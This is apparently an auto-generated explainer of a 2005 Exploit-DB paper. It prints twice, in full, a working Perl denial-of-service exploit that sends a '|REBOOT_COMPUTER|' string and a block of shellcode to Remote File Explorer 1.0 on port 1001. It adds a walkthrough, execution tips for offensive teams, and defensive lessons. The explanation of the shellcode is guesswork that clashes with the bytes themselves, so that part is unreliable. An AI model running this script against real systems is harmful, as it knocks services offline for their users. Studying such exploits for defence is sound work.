By exploitdb papers bot•July 11, 2005•

papers

Remote File Explorer 1.0 Denial of Service Exploit Explained

What this paper is

This paper describes a Denial of Service (DoS) vulnerability in Remote File Explorer version 1.0. The exploit targets a specific vulnerability in how the software handles a particular network request, causing the server process to crash and become unresponsive, thus denying service to legitimate users.

Simple technical breakdown

The exploit works by sending a malformed network request to the Remote File Explorer service. This request contains a specially crafted string that includes a sequence of bytes. When the vulnerable server receives and attempts to process this string, it encounters an error in its logic, leading to a crash. The core of the exploit is the payload sent over the network, which is designed to trigger this crash.

Complete code and payload walkthrough

The provided script is written in Perl and uses the Socket module for network communication.

#!/usr/local/bin/perl
#
#    Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
#  [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
#  [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com


$ARGC=@ARGV;
if ($ARGC !=1) {
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";


$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

# milw0rm.com [2005-07-11]

Code Fragment/Block -> Practical Purpose

#!/usr/local/bin/perl: Shebang line, indicating the script should be executed with the Perl interpreter.
Comments (# ...): Provide context, status messages, and information about the exploit.
$ARGC=@ARGV; if ($ARGC !=1) { ... }: Checks if exactly one command-line argument (the target host) is provided. If not, it prints usage instructions and exits.
use Socket;: Imports the Socket module, which provides functions for network programming.
my($remote,$port,$iaddr,$paddr,$proto);: Declares variables to store network-related information.
$remote=$ARGV[0];: Assigns the first command-line argument (the target hostname or IP address) to the $remote variable.
$port = "1001";: Sets the target port to 1001, which is the default port for Remote File Explorer.
$iaddr = inet_aton($remote) or die "Error: $!";: Converts the human-readable hostname/IP address into a network address format (binary).
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";: Creates a socket address structure from the port and network address.
$proto = getprotobyname('tcp') or die "Error: $!";: Retrieves the protocol number for TCP.
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";: Creates a new TCP socket. SOCK is the filehandle for this socket.
connect(SOCK, $paddr) or die "Error: $!";: Attempts to establish a TCP connection to the target host and port.
$sploit = "|REBOOT_COMPUTER|". ... ;: This is the core of the exploit. It defines a string that will be sent to the server.
- "|REBOOT_COMPUTER|": This is a literal string. Its exact purpose within the exploit is not explicitly detailed in the paper, but it might be a marker or a command intended for the Remote File Explorer application.
- "\xeb\x6e\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x40\x89\xc3\x89\x46\x0c\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x88\x46\x08\x31\xc0\x31\xd2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x08\x31\xc0\x31\xd2\x89\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x8d\xff\xff": This is a sequence of hexadecimal bytes representing machine code. This is the actual payload designed to trigger the DoS. Without a disassembler and deeper analysis of the Remote File Explorer's binary, the exact sequence of operations performed by this shellcode is unknown. However, it's common for such payloads to attempt to perform operations that lead to a crash, such as:
  - Dereferencing a NULL pointer.
  - Writing to an invalid memory location.
  - Executing an illegal instruction.
  - Causing an infinite loop or excessive resource consumption.
    The presence of bytes like \xeb (JMP), \x5e (POP esi), \x29\xc0 (sub eax, eax), \x89 (MOV), \x46 (INC esi), \xb0 (MOV AL, imm8), \xcd\x80 (INT 0x80 - Linux syscall, but this is likely for Windows, so it might be misinterpreted or part of a larger structure), \x66 (operand size override prefix), \x8d (LEA), \x43 (INC EBX), \x31\xc0 (XOR EAX, EAX), \x90 (NOP), \x0b (OR), \xe8 (CALL) suggests typical shellcode patterns. The specific sequence is crafted to exploit a particular vulnerability in the target application's parsing or handling of this data.
$msg = $sploit;: Assigns the constructed payload string to the $msg variable.
print $msg;: Prints the payload to standard output (this is mostly for debugging and seeing what's being sent).
send(SOCK, $msg, 0) or die "Cannot send query: $!";: Sends the $msg (the exploit payload) over the established TCP connection. The 0 indicates no special flags.
sleep(1);: Pauses execution for 1 second, likely to allow the server to process the data and crash.
close(SOCK);: Closes the network connection.
exit;: Exits the script.

Shellcode/Payload Segment -> Practical Purpose

The entire sequence of hexadecimal bytes starting from \xeb\x6e... is the shellcode. Without the target binary and a debugger, a precise, instruction-by-instruction breakdown of the shellcode's intended actions is not possible. However, based on common exploit patterns for DoS, this shellcode is designed to:

Trigger a specific vulnerability: It contains data or instructions that, when processed by the vulnerable Remote File Explorer service, lead to an unhandled exception or a fatal error.
Cause a crash: The ultimate goal is to make the server process terminate unexpectedly, thus rendering the service unavailable.

The specific bytes are likely crafted to:

Overwrite critical memory structures.
Cause an invalid memory access.
Execute an instruction that the processor cannot handle in the current context.
Enter an infinite loop, consuming resources.

The |REBOOT_COMPUTER| prefix is a string literal. It's unclear if this string is directly processed by the vulnerable code or if it's just a preamble. The subsequent bytes are the machine code.

Practical details for offensive operations teams

Required Access Level: Network access to the target host on port 1001. No local privileges are required on the target machine.
Lab Preconditions:
- A target machine running Remote File Explorer 1.0.
- The target machine must be accessible over the network on TCP port 1001.
- A testing machine with Perl and the Socket module installed.
Tooling Assumptions:
- Perl interpreter.
- Standard network utilities (e.g., ping, nmap to verify port status).
- A disassembler (like IDA Pro or Ghidra) would be invaluable for analyzing the target binary to understand why this payload works, but is not strictly required to execute the exploit.
Execution Pitfalls:
- Incorrect Port: If Remote File Explorer is configured to listen on a different port, the exploit will fail.
- Firewall Blocking: Network firewalls can block traffic to port 1001.
- Service Not Running: The exploit will fail if the Remote File Explorer service is not running or is not listening on the expected port.
- Version Mismatch: The exploit is specific to Remote File Explorer 1.0. Newer versions or different applications will not be affected.
- Network Latency/Packet Loss: While less likely to cause a complete failure for a simple DoS, significant network issues could prevent the payload from reaching the server correctly.
- Antivirus/Intrusion Detection Systems (IDS): While this exploit is old, network-based IDS might flag the unusual traffic pattern or the specific payload bytes if signatures exist.
Tradecraft Considerations:
- Reconnaissance: Confirm the target application and version are present. Identify the listening port.
- Stealth: This exploit is noisy as it directly connects and sends data. It's unlikely to be stealthy.
- Impact Assessment: A DoS can disrupt operations. Ensure authorization is clear for such disruptive actions.
- Post-Exploitation: For a DoS, there is no "post-exploitation" in the traditional sense of gaining further access. The goal is service disruption.

Where this was used and when

Context: This exploit targets the Remote File Explorer application, likely a file sharing or remote administration tool.
Approximate Years/Dates: Published on Exploit-DB on July 11, 2005. The vulnerability likely existed and was exploited around this time. The "Tested on Windows2000 SP4" indicates it was relevant for that operating system version.

Defensive lessons for modern teams

Patch Management: Keep all software, especially network-facing services, updated to the latest stable versions. This exploit targets an old, unpatched version.
Network Segmentation: Isolate critical services on separate network segments to limit the blast radius of a DoS attack.
Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS with up-to-date signatures to detect and potentially block malformed or suspicious network traffic.
Service Hardening: Configure services to run with minimal privileges and disable unnecessary features.
Regular Audits: Periodically audit running services and their versions to identify vulnerable software.
Application Security Testing: For custom applications, conduct thorough security testing (including fuzzing) to uncover vulnerabilities before deployment.

ASCII visual (if applicable)

This exploit is a direct network interaction. An ASCII visual might represent the connection and data flow.

+-----------------+       TCP Port 1001       +--------------------------+
| Attacker (Perl) | ------------------------> | Remote File Explorer 1.0 |
|                 |      (Exploit Payload)    |       (Vulnerable)       |
+-----------------+                           +--------------------------+
                                                       |
                                                       | (Malicious data processed)
                                                       v
                                                  +----------+
                                                  |  CRASH   |
                                                  +----------+
                                                  (Service Unavailable)

Source references

Paper ID: 1100
Paper Title: Remote File Explorer 1.0 - Denial of Service
Author: basher13
Published: 2005-07-11
Keywords: Windows, dos
Paper URL: https://www.exploit-db.com/papers/1100
Raw URL: https://www.exploit-db.com/raw/1100

Original Exploit-DB Content (Verbatim)

#!/usr/local/bin/perl
#
#    Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
#  [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
#  [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com


$ARGC=@ARGV;
if ($ARGC !=1) {
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";


$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;

# milw0rm.com [2005-07-11]